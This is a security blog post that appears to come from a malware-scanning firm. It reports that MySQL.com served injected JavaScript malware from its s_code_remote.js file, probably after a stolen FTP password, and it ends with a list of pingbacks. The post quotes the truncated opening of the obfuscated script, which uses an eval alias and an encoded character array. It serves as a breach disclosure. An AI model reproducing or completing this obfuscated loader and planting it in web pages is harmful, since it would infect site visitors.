It looks like the MySQL.com website is currently hacked and compromised with a JavaScript malware (and serving malware to anyone visiting it).
Our scanner identified the malware as mwjs159 which is often related to stolen FTP passwords. So it looks like one of their developers got their desktop compromised and had his password stolen. From our scanner:
So the compromised file was http://mysql.com/common/js/s_code_remote.js and we recommend that you do not visit the site right now. We will post more details as we learn more about it…
(Seems that MySQL.com fixed it already)Try view-source:http://mysql.com/common/js/s_code_remote.js if you want to see the malicious code on the site. It starts as:
Object.prototype.qwe=function(){return
String.fromCharCode;};Object.prototype.asd="e";var s="";try{{}["qwtqwt"]
();}catch(q){if(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode("123")
.data&&typeof{}.asd.vfr===’undefined’)n=2;e=eval;m=[18/n,18/n,210/n,204/n,64/n,80/n,200/n, 222/n, 198/n, 234/n, 218/n, 202/n, 220/n, 232/n, 92/n, 206/n, 202/n,232/n, …
Update: It seems that MySQL.com fixed it already.
About David Dede
Pingback: Elegant D » MySQL.com Hacked (Javascript Malware) | Sucuri
Pingback: ste williams » MySQL.com breach leaves visitors exposed to malware
Pingback: MySQL.com breach leaves visitors exposed to malware | BlogerWar
Pingback: MySQL.com breach leaves visitors exposed to malware | LINUX REVIEW
Pingback: Mysql.com Serves Malware for the Second Time This Year
Pingback: MySQL.com breach leaves visitors exposed to malware | VHOSTING247
Pingback: maccad» MySQL.com breach leaves visitors exposed to malware
Pingback: More Hacks « 36 Chambers – The Legendary Journeys: Execution to the max!
Pingback: MySQL.com breach leaves visitors exposed to malware « Tech News
Pingback: Javascript malware | Zerkalot